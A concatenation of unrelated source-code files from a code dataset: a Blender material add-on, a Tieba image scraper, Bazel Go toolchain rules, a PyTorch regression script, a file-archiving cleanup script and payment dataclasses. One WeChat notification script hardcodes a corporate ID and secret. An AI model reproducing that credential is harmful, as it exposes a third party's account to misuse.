text=text)\n\n\t\t\t\t\t# image browse control\n\t\t\t\t\trow = split.row()\n\t\t\t\t\trow.active = textureSlot.use\n\t\t\t\t\trow.template_ID(tex, \"image\", open=\"image.open\")\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\t\n\t\t\t\t\t# empty\n\t\t\t\t\trow = split.row()\n\t\t\t\t\t\n\t\t\t\t\tsplit.active = textureSlot.use\n\t\t\t\t\t# additional properties\n\t\t\t\t\tif text == 'Col':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'diffuse_color_factor', text='Factor')\n\t\t\t\t\t\tsplit.prop(mat, 'diffuse_color', text='')\n\t\t\t\t\tif text == 'Nor':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'normal_factor', text='Factor')\n\t\t\t\t\tif text == 'Gloss':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'default_value', text='Factor')\n\n\t\t\t\t\tif textureSlot.texture_coords == 'UV' and tex.image:\n\t\t\t\t\t\tsplit.prop_search(textureSlot, \"uv_layer\", context.active_object.data, \"uv_textures\", text=\"\")\n\n\nclass BLEasyMaterialAdv(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates the EasyMaterial UI\"\"\"\n\tbl_label = \"Advanced\"\n\tbl_category = \"Easy Material\"\n\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn context.active_object\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\t# bail on no mat slot\n\t\tif not context.active_object.material_slots:\n\t\t\treturn\n\n\t\t# material editor\n\t\trow = layout.row()\n\t\tfor materialSlot in context.active_object.material_slots:\n\t\t\tmat = materialSlot.material\n\n\t\t\t# bail code\n\t\t\tif not mat:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif 'uberMaterial' not in mat:\n\t\t\t\t# row.label('Not an UberMaterial', icon='ERROR')\n\t\t\t\tcontinue\n\t\t\t\n\t\t\trow.prop(mat, 'use_transparency', 'Transparent')\n\t\t\tif mat.use_transparency:\n\t\t\t\trow.prop(mat, 'transparency_method', expand=True)\n\n\t\t\tfor textureSlot in mat.texture_slots:\n\t\t\t\tif textureSlot:\n\n\t\t\t\t\t# bail code\n\t\t\t\t\tif textureSlot.use_map_color_spec and textureSlot.blend_type == 'COLOR':\n\t\t\t\t\t\trow.prop(textureSlot, 'use', text='Metallic (Use color from Gloss map as Spec Color)')\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\trow = layout.row()\n\t\t\t\t\ttex = textureSlot.texture\n\t\t\t\t\ttext = tex.name.split('.')[-1]\n\t\t\t\t\tif text.isnumeric():\n\t\t\t\t\t\ttext = tex.name.split('.')[-2]\n\t\t\t\t\t\n\t\t\t\t\tif text != 'Emit' and text!= 'Alpha':\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t# enable/disable texture channel\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\tsplit.prop(textureSlot, 'use', text=text)\n\n\t\t\t\t\t# image browse control\n\t\t\t\t\tsplit.template_ID(tex, \"image\", open=\"image.open\")\n\t\t\t\t\tsplit = layout.split(percentage=0.20)\n\t\t\t\t\t\n\t\t\t\t\t# empty\n\t\t\t\t\trow = split.row()\n\n\t\t\t\t\t# additional properties\n\t\t\t\t\tif text == 'Emit':\n\t\t\t\t\t\tsplit.prop(textureSlot, 'emit_factor', text='Factor')\n\t\t\t\t\t\n\t\t\t\t\tif textureSlot.texture_coords == 'UV' and tex.image:\n\t\t\t\t\t\tsplit.prop_search(textureSlot, \"uv_layer\", context.active_object.data, \"uv_textures\", text=\"\")\n\n\t\nclass BLEasyAsset(GamePanel, bpy.types.Panel):\n\t\"\"\"Creates The Easy Asset Interface\"\"\"\n\tbl_label = \"Easy Asset\"\n\tbl_context = \"objectmode\"\n\tbl_category = \"Easy Asset\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tobj = context.object\n\n\t\trow = layout.row()\n\t\trow.label('Create Camera')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='FPS Camera').arg = 'camera.fps'\n\t\trow.operator(\"easy.assetcreate\", text='Orbit Camera').arg = 'camera.orbit'\n\n\t\trow = layout.row()\n\t\trow.label('Create Lights')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Day-Night Cycle').arg = 'light.cycle'\n\t\trow.operator(\"easy.assetcreate\", text='Soft Light').arg = 'light.soft'\n\t\t\n\t\trow = layout.row()\n\t\trow.label('Create Objects')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Plane Mirror').arg = 'obj.mirror'\n\t\t# row.operator(\"easy.assetcreate\", text='Orbit Camera').arg = 'camera.orbit'\n\n\n\t\trow = layout.row()\n\t\trow.label('Effects')\n\t\trow = layout.row(align=True)\n\t\trow.operator(\"easy.assetcreate\", text='Post-Processing 2D Filters').arg = 'post.main'\n\n\t\trow = layout.row()\n\t\t\n\t\t# row.label('Assets:')\n\t\t# template_list now takes two new args.\n\t\t# The first one is the identifier of the registered UIList to use (if you want only the default list,\n\t\t# with no custom draw code, use \"UI_UL_list\").\n\t\t# layout.template_list(\"UI_UL_list\", \"assetid\", obj, \"material_slots\", obj, \"active_material_index\")\n\n\n\nclass BLEasyMaterialCreate(bpy.types.Operator):\n\t\"\"\"Create an übershader\"\"\"\n\tbl_label = \"New UberMaterial\"\n\tbl_idname = 'easy.matcreate'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tMatName = bpy.props.StringProperty(name='Material Name', default='uber')\n\n\tdef execute(self, context):\n\t\terror = easyMaterial.sanityCheck(context)\n\t\tif not error:\n\t\t\tmat = easyMaterial.createMaterial(context, self.MatName)\n\t\t\teasyMaterial.assignMaterial(context, mat)\n\t\t\treturn {'FINISHED'}\n\t\telse:\n\t\t\tself.report({'ERROR'}, error)\n\t\t\treturn {'CANCELLED'}\n\n\nclass BLEasyAssetCreate(bpy.types.Operator):\n\t\"\"\"Create an asset\"\"\"\n\tbl_label = \"New Asset\"\n\tbl_idname = 'easy.assetcreate'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\targ = bpy.props.StringProperty()\n\t\n\tdef execute(self, context):\n\t\tobjType, option = self.arg.split('.')\n\t\t\n\t\t# cleanup before we start\n\t\tbpy.ops.object.select_all(action='DESELECT')\n\n\t\tif objType == 'camera':\n\t\t\terror = easyAsset.createCamera(option)\n\t\telif objType == 'light':\n\t\t\terror = easyAsset.createLight(option)\n\t\telif objType == 'obj':\n\t\t\terror = easyAsset.createObj(option)\n\t\telif objType == 'post':\n\t\t\terror = easyAsset.createPost(option)\n\t\telse:\n\t\t\terror = 'Sorry, not implemented yet.'\n\n\t\tif error:\n\t\t\tself.report({'ERROR'}, error)\n\t\t\treturn {'CANCELLED'}\n\t\telse:\n\t\t\treturn {'FINISHED'}\n\t\t\n\n","sub_path":"Addon/easyGame/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257150668","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jarod Zheng'\n\n'''\nGet pictures from webside\n'''\n\nimport os\nimport re \nimport urllib \nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\n\n#PATH = os.path.join(os.path.dirname(__file__), 'pic', '%s.jpg')\n\n'''\ndef getHtml(url): \n req = request.Request(url)\n req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') \n page = request.urlopen(req) \n html = page.read() \n return html \n \ndef getImg(html): \n reg = r'src=\"(.+?\\.jpg)\" ' \n imgre = re.compile(reg) \n html = html.decode('utf-8')\n imglist = imgre.findall(html) \n x = 0 \n for imgurl in imglist: \n urllib.request.urlretrieve(imgurl, PATH % x) \n x = x + 1 \n \n\n\n\n\nhtml = getHtml(\"https://tieba.baidu.com/p/1546249911\") \ngetImg(html)\nprint('Completed!!!')\n'''\n\n\nSource = ['http://tieba.baidu.com/p/1864966611', \n'http://tieba.baidu.com/p/1962466429', \n'http://tieba.baidu.com/p/1962466429?pid=25908281312&cid=0#25908281312', \n'http://tieba.baidu.com/p/2028824237', \n'http://tieba.baidu.com/p/2028824237?pid=26953482114&cid=0#26953482114',\n'http://tieba.baidu.com/p/2066742642', \n'http://tieba.baidu.com/p/2122598315', \n'http://tieba.baidu.com/p/2170607777', \n'http://tieba.baidu.com/p/2202869537']\n\nf = 370\n\nfor html_doc in Source:\n#html_doc = \"https://tieba.baidu.com/p/1794831901\"\n \n Temp_PATH = os.path.join(os.path.dirname(__file__), 'pic', '%s' % f)\n os.makedirs(Temp_PATH)\n PATH = os.path.join(Temp_PATH, '%s.jpg')\n\n\n\n\n req = urllib.request.Request(html_doc) \n webpage = urllib.request.urlopen(req) \n html = webpage.read()\n\n\n soup = BeautifulSoup(html, 'html.parser')\n\n\n #抓取图片地址\n #抓取img标签且class为BDE_Image的所有内容\n img_src=soup.findAll(\"img\",{'class':'BDE_Image'})\n \n try:\n x = 0 \n for img in img_src:\n urllib.request.urlretrieve(img.get('src'), PATH % x) \n print(x)\n x = x + 1 \n\n #img=img.get('src') #抓取src\n #print(img)\n except urllib.error.URLError as e:\n print('except:', e)\n finally:\n pass\n print(f)\n f = f+1\n\n\n\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"240529540","text":"# Copyright 2014 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nGO_TOOLCHAIN_BUILD_FILE = \"\"\"\nload(\"@io_bazel_rules_go//go/private:go_root.bzl\", \"go_root\")\n\npackage(\n default_visibility = [ \"//visibility:public\" ])\n\nfilegroup(\n name = \"toolchain\",\n srcs = glob([\"bin/*\", \"pkg/**\", ]),\n)\n\nfilegroup(\n name = \"go_tool\",\n srcs = [ \"bin/go\" ],\n)\n\nfilegroup(\n name = \"go_src\",\n srcs = glob([\"src/**\"]),\n)\n\nfilegroup(\n name = \"go_include\",\n srcs = [ \"pkg/include\" ],\n)\n\ngo_root(\n name = \"go_root\",\n path = \"{goroot}\",\n)\n\"\"\"\n\ndef _go_sdk_repository_impl(ctx):\n ctx.download_and_extract(\n url = ctx.attr.url,\n stripPrefix = ctx.attr.strip_prefix,\n sha256 = ctx.attr.sha256)\n goroot = ctx.path(\".\")\n ctx.file(\"BUILD.bazel\", GO_TOOLCHAIN_BUILD_FILE.format(goroot = goroot))\n\ngo_sdk_repository = repository_rule(\n implementation = _go_sdk_repository_impl, \n attrs = {\n \"url\" : attr.string(),\n \"strip_prefix\" : attr.string(),\n \"sha256\" : attr.string(),\n })\n\ndef _go_repository_select_impl(ctx):\n os_name = ctx.os.name\n\n # 1. Configure the goroot path\n if os_name == 'linux':\n go_toolchain = ctx.attr.go_linux_version\n elif os_name == 'mac os x':\n go_toolchain = ctx.attr.go_darwin_version\n else:\n fail(\"Unsupported operating system: \" + os_name)\n if go_toolchain == None:\n fail(\"No Go toolchain provided for host operating system: \" + os_name)\n goroot = ctx.path(go_toolchain).dirname\n\n # 2. Create the symlinks.\n ctx.symlink(goroot.get_child(\"bin\"), \"bin\")\n ctx.symlink(goroot.get_child(\"pkg\"), \"pkg\")\n ctx.symlink(goroot.get_child(\"src\"), \"src\")\n ctx.symlink(goroot.get_child(\"BUILD.bazel\"), \"BUILD.bazel\")\n\n_go_repository_select = repository_rule(\n _go_repository_select_impl,\n attrs = {\n \"go_linux_version\": attr.label(\n allow_files = True,\n single_file = True,\n ),\n \"go_darwin_version\": attr.label(\n allow_files = True,\n single_file = True,\n ),\n },\n)\n\ndef go_repository_select(\n go_version = None,\n go_linux = None,\n go_darwin = None):\n if not go_version and not go_linux and not go_darwin:\n go_version = \"1.8.3\"\n\n if go_version:\n if go_linux:\n fail(\"go_repositories: go_version and go_linux can't both be set\")\n if go_darwin:\n fail(\"go_repositories: go_version and go_darwin can't both be set\")\n go_linux = \"@go%s.linux-amd64\" % go_version\n go_darwin = \"@go%s.darwin-amd64\" % go_version\n\n go_linux_version = go_linux + \"//:VERSION\" if go_linux else None\n go_darwin_version = go_darwin + \"//:VERSION\" if go_darwin else None\n\n _go_repository_select(\n name = \"io_bazel_rules_go_toolchain\",\n go_linux_version = go_linux_version,\n go_darwin_version = go_darwin_version,\n )\n","sub_path":"go/private/toolchain.bzl","file_name":"toolchain.bzl","file_ext":"bzl","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"529429128","text":"# add secret entry for DISCORD_TOKEN (bot)\n# add secret entry for TELEGRAM_TOKEN (bot)\n# add a new entry for secret TELEGRAM_CHILL_GROUP_INVITE with the link of the telegram group you want to send the pool\n\n\nChillServerGroupTest = -1\nTestChat = -2\n\n\n# Configure the channels and server here to from where you want to receive the messages.\n\nserversDict = {\n \"⭐ChillServer\": {\n\t\t\t\"🤖bottest\": [ChillServerGroupTest, TestChat]\n\t\t}\n}\n\npollServDict = {\n\t\"⭐ChillServer\": {\n\t\t\"🤖bottest\": ChillServerGroupTest\n\t}\n}\n","sub_path":"conf-bkp.py","file_name":"conf-bkp.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118435721","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 24 17:20:54 2017\n\n@author: pc\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\ndf = pd.read_excel(r\"/home/pc/上证指数数据.xlsx\")\n\ndf1 = df.iloc[:100, 3:6].values\nxtrain_features = torch.FloatTensor(df1)\ndf2 = df.iloc[1:101, 6].values\nxtrain_labels = torch.FloatTensor(df2)\nxtrain = torch.unsqueeze(xtrain_features, dim=1)\nytrain = torch.unsqueeze(xtrain_labels, dim=1)\nx, y = torch.autograd.Variable(xtrain), Variable(ytrain)\n\n\nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(input_size, hidden_size)\n self.relu = nn.ReLU()\n self.fc2 = nn.Linear(hidden_size, num_classes)\n\n def forward(self, x):\n out = self.fc1(x)\n out = self.relu(out)\n out = self.fc2(out)\n return out\n\n\nnet = Net(input_size=4, hidden_size=100, num_classes=1)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(net.parameters(), lr=0.005)\nfor epoch in range(100000):\n inputs = x\n target = y\n out = net(inputs)\n loss = criterion(out, target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if (epoch + 1) % 20 == 0:\n print('Epoch[{}], loss: {:.6f}'.format(epoch + 1, loss.data[0]))\n\nnet.eval()\npredict = net(x)\npredict = predict.data.numpy()\nprint(predict)\n","sub_path":"pytorch/class/chapter12/pt02_feedforward_neural_network02.py","file_name":"pt02_feedforward_neural_network02.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"449516174","text":"class MyData:\n\n title = None\n description = None\n fullText = None\n date = None\n source = None\n url = None\n\n def __str__(self):\n return \"%s - %s\" % (self.date, self.title)\n\n\nclass MyDataList(list):\n\n dummy = None\n\n def __init__(self):\n self.dummy = None\n\n def __str__(self):\n for i in self:\n print(i)\n return \"\"\n\n\n","sub_path":"MyData.py","file_name":"MyData.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"399618394","text":"class Name:\n def __init__(self):\n print('Name id: %d' % id(self))\n\nx = Name()\ny = Name() * 10\n\n# Name id: 2475074859528\n# Name id: 2475074859192\n# Traceback (most recent call last):\n# File \"F:\\FluentPython\\对象引用、可变性和垃圾回收\\ex8_2.py\", line 6, in \n# y = Name() * 10\n# TypeError: unsupported operand type(s) for *: 'Name' and 'int'\n# [Finished in 0.6s with exit code 1]\n","sub_path":"对象引用、可变性和垃圾回收/ex8_2.py","file_name":"ex8_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141516886","text":"import json\nimport sys\n\nfrom api.sites import requests\n\n\nclass Token(object):\n def get_token(self):\n corpid = 'wxe4add0ebfde1dd98'\n corpsecret = 'jBnxvmMzXSxrz3goqVw0tWgnBOrsfH2YWo9gKcETu92AbVdZAAnK80sXjnj3FQIn'\n r = requests.get(\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=%s&corpsecret=%s\" % (corpid, corpsecret))\n access_token = r.json()['access_token']\n return access_token\n\n\n# def send_message(content):\n# url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + Token().get_token()\n# payload = {\n# \"touser\": \"@all\",\n# \"msgtype\": \"text\",\n# \"agentid\": 1,\n# \"text\": {\n# \"content\": '%s' % content\n# },\n# \"safe\": 0\n# }\n# r = requests.bak.post(url=url, data=json.dumps(payload))\n\n\ndef send_message(title, content, burl):\n url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + Token().get_token()\n payload = {\n \"touser\": \"@all\",\n \"msgtype\": \"news\",\n \"agentid\": 1,\n \"news\": {\n \"articles\": [\n {\n \"title\": \"%s\" % title,\n \"description\": \"%s\" % content,\n \"url\": \"%s\" % burl,\n }\n ]\n }\n }\n r = requests.post(url=url, data=json.dumps(payload, ensure_ascii=False).encode('utf-8'))\n\n\nif __name__ == '__main__':\n send_message(\"第%s次构建\" % sys.argv[1], '构建异常,请点击详情查看Console Output', sys.argv[2])\n","sub_path":"api/todo/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162560516","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport ctypes\nimport itertools\nimport os\nimport string\nimport platform\nimport shutil\nimport time \nimport sys\n\n#function checking if a disk is connected \ndef get_available_drives():\n if 'Windows' not in platform.system():\n return []\n drive_bitmask = ctypes.cdll.kernel32.GetLogicalDrives()\n return list(itertools.compress(string.ascii_uppercase,\n map(lambda x:ord(x) - ord('0'), bin(drive_bitmask)[:1:-1])))\n\n#checking if disk z is connected\nif 'Z' not in get_available_drives():\n print (\"Connect Disk Z for program to work.\")\nelse:\n print (\"Disk Z is connected. Program Started.\")\n\ndpath = r'D:\\archiv2\\temp'\nos.makedirs(dpath) \n\n#Clearing a catalog files on disk Z\npath1 = r'Z:\\spl\\result\\catalog.loc'\nopen(path1, 'w').close()\n\n#deleating everything in the folder calibrate\nfolder = r'Z:\\calibrate'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n#deleating everything in the folder calibrate1\nfolder = r'Z:\\calibrate1'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\nfolder = r'Z:\\locat'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\npath2 = r'Z:\\calibrate\\catalog.kal'\nopen(path2, 'w').close()\n\nstart= r\"D:\\LASER-2\\DATA\\KAT_OBS.DIC\"\nend = r'D:\\archiv2\\temp'\nshutil.copy(start,end)\n\nstart= r\"D:\\LASER-2\\DATA\\KAT_KAL.DIC\"\nend = r'D:\\archiv2\\temp'\nshutil.copy(start,end)\n\nstart= r\"D:\\LASER-2\\DATA\\KAT_KBO.DIC\"\nend = r'D:\\archiv2\\temp'\nshutil.copy(start,end)\n\n\n# In[32]:\n\n#copying the extensions files\nsource_directory_path = r\"D:\\LASER-2\\DATA\"\ndestination_directory_path = r'D:\\archiv2\\temp'\n\nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".ega\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n \nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".oga\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n \nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".KGA\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n \nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".LGA\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n \nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".PGA\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n\nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".CGA\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\nfor source_filename in os.listdir(source_directory_path):\n if source_filename.endswith(\".prn\"):\n source_file_path = os.path.join(source_directory_path, source_filename)\n shutil.copy(source_file_path, destination_directory_path)\n\n\n\n#getting specific extensions which start with T and K and have a number in them\nimport glob\npath3 = r\"D:\\LASER-2\\DATA\"\nos.chdir(path3)\nfiles = []\nfor file in glob.glob('T?*.K*[0-99]'):\n files.append(file)\nsource = r'D:\\archiv2\\temp'\nfor u in files:\n shutil.copy(u,source)\n\n#giving the temp folder a name with a date\nfrom datetime import datetime\ndirectory = r'D:\\archiv2'\nos.chdir(directory)\nname = r'temp'\nos.rename(name, datetime.today().strftime('%Y_%m_%d'))\n\n#archiving files\nshutil.make_archive(datetime.today().strftime('%Y_%m_%d'), 'zip', datetime.today().strftime('%Y_%m_%d'))\n\n#deleating the folder, leaving only archived folder\nshutil.rmtree(datetime.today().strftime('%Y_%m_%d'))\n\ndirectory = r\"D:\\LASER-2\\DATA\"\nos.chdir(directory)\nopen('KAT_OBS.DIC', 'w').close()\nopen('KAT_KAL.DIC', 'w').close()\nopen('KAT_KBO.DIC', 'w').close()\n\n\nimport glob\nfor file in glob.glob('*ega'):\n os.remove(file)\nfor file in glob.glob('*oga'):\n os.remove(file)\nfor file in glob.glob('*KGA'):\n os.remove(file)\nfor file in glob.glob('*LGA'):\n os.remove(file)\nfor file in glob.glob('*PGA'):\n os.remove(file)\nfor file in glob.glob('*CGA'):\n os.remove(file)\nfor file in glob.glob('*prn'):\n os.remove(file)\nfor file in glob.glob('T?*.K*[0-99]'):\n os.remove(file)\n\npath4 = r\"D:\\LASER-2\\DATA\"\nos.chdir(path4)\nfor file in glob.glob('T?*.K*[0-99]'):\n os.remove(file)\n\nprint('program completed')\n\n","sub_path":"Catalagoue-Cleaning.py","file_name":"Catalagoue-Cleaning.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222257609","text":"from dataclasses import dataclass, field\nfrom decimal import Decimal\nfrom enum import Enum\nfrom typing import List, Optional\n\n__NAMESPACE__ = \"http://www.bysquare.com/bysquare\"\n\n\n@dataclass\nclass BankAccount:\n \"\"\"\n single bank account.\n\n :ivar iban: IBAN code\n :ivar bic: SWIFT code\n \"\"\"\n iban: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"IBAN\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n \"pattern\": r\"[A-Z]{2}[0-9]{2}[A-Z0-9]{0,30}\",\n }\n )\n bic: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BIC\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[A-Z]{4}[A-Z]{2}[A-Z\\d]{2}([A-Z\\d]{3})?\",\n }\n )\n\n\n@dataclass\nclass BySquareDocument:\n pass\n\n\nclass DirectDebitScheme(Enum):\n \"\"\"direct debit scheme, can be \"SEPA\" or \"other\".\n\n Use \"SEPA\" if direct debit complies with SEPA direct debit scheme\n \"\"\"\n OTHER = \"other\"\n SEPA = \"SEPA\"\n\n\nclass DirectDebitType(Enum):\n \"\"\"\n type of direct debit, can be \"one-off\" or \"recurrent\".\n \"\"\"\n ONE_OFF = \"one-off\"\n RECURRENT = \"recurrent\"\n\n\nclass Month(Enum):\n JANUARY = \"January\"\n FEBRUARY = \"February\"\n MARCH = \"March\"\n APRIL = \"April\"\n MAY = \"May\"\n JUNE = \"June\"\n JULY = \"July\"\n AUGUST = \"August\"\n SEPTEMBER = \"September\"\n OCTOBER = \"October\"\n NOVEMBER = \"November\"\n DECEMBER = \"December\"\n\n\nclass PaymentOption(Enum):\n PAYMENTORDER = \"paymentorder\"\n STANDINGORDER = \"standingorder\"\n DIRECTDEBIT = \"directdebit\"\n\n\nclass Periodicity(Enum):\n DAILY = \"Daily\"\n WEEKLY = \"Weekly\"\n BIWEEKLY = \"Biweekly\"\n MONTHLY = \"Monthly\"\n BIMONTHLY = \"Bimonthly\"\n QUARTERLY = \"Quarterly\"\n ANNUALLY = \"Annually\"\n SEMIANNUALLY = \"Semiannually\"\n\n\n@dataclass\nclass BankAccounts:\n \"\"\"\n :ivar bank_account: single bank account\n \"\"\"\n bank_account: List[BankAccount] = field(\n default_factory=list,\n metadata={\n \"name\": \"BankAccount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"min_occurs\": 1,\n }\n )\n\n\n@dataclass\nclass DirectDebitExt:\n \"\"\"direct debit extension.\n\n Extends basic payment information with information required for\n identification and setup of direct debit\n\n :ivar direct_debit_scheme: direct debit scheme, can be \"SEPA\" or\n \"other\". Use \"SEPA\" if direct debit complies with SEPA direct\n debit scheme\n :ivar direct_debit_type: type of direct debit, can be \"one-off\" or\n \"recurrent\"\n :ivar variable_symbol: variable symbol\n :ivar specific_symbol: specific symbol\n :ivar originators_reference_information: reference information\n :ivar mandate_id: identification of the mandate between creditor and\n debtor\n :ivar creditor_id: identification of the creditor\n :ivar contract_id: identification of the contract between creditor\n and debtor\n :ivar max_amount: maximum amount that can be debited\n :ivar valid_till_date: direct debit valid till date\n \"\"\"\n direct_debit_scheme: Optional[DirectDebitScheme] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitScheme\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n direct_debit_type: Optional[DirectDebitType] = field(\n default=None,\n metadata={\n \"name\": \"DirectDebitType\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"required\": True,\n }\n )\n variable_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"VariableSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n specific_symbol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SpecificSymbol\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n \"pattern\": r\"[0-9]{0,10}\",\n }\n )\n originators_reference_information: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"OriginatorsReferenceInformation\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n mandate_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"MandateID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n creditor_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"CreditorID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n contract_id: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ContractID\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n max_amount: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"MaxAmount\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n valid_till_date: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"ValidTillDate\",\n \"type\": \"Element\",\n \"namespace\": \"http://www.bysquare.com/bysquare\",\n }\n )\n\n\n@dataclass\nclass StandingOrderExt:\n \"\"\"standing order extension.\n\n Extends basic payment information with information required for\n standing order setup\n\n :ivar day: this is the payment day. It‘s meaning depends on the\n periodicity, meaning either day of the month (number between 1\n and 31) or day of the week (1=Monday, 2=Tuesday, …, 7=Sunday).\n :ivar month: selection of months on which payment occurs. If used,\n set periodicity to \"Annually\". If payment occurs every month or\n every other month consider setting periodicity to \"Monthly\" or\n \"Bimonthly\" instead.\n :ivar 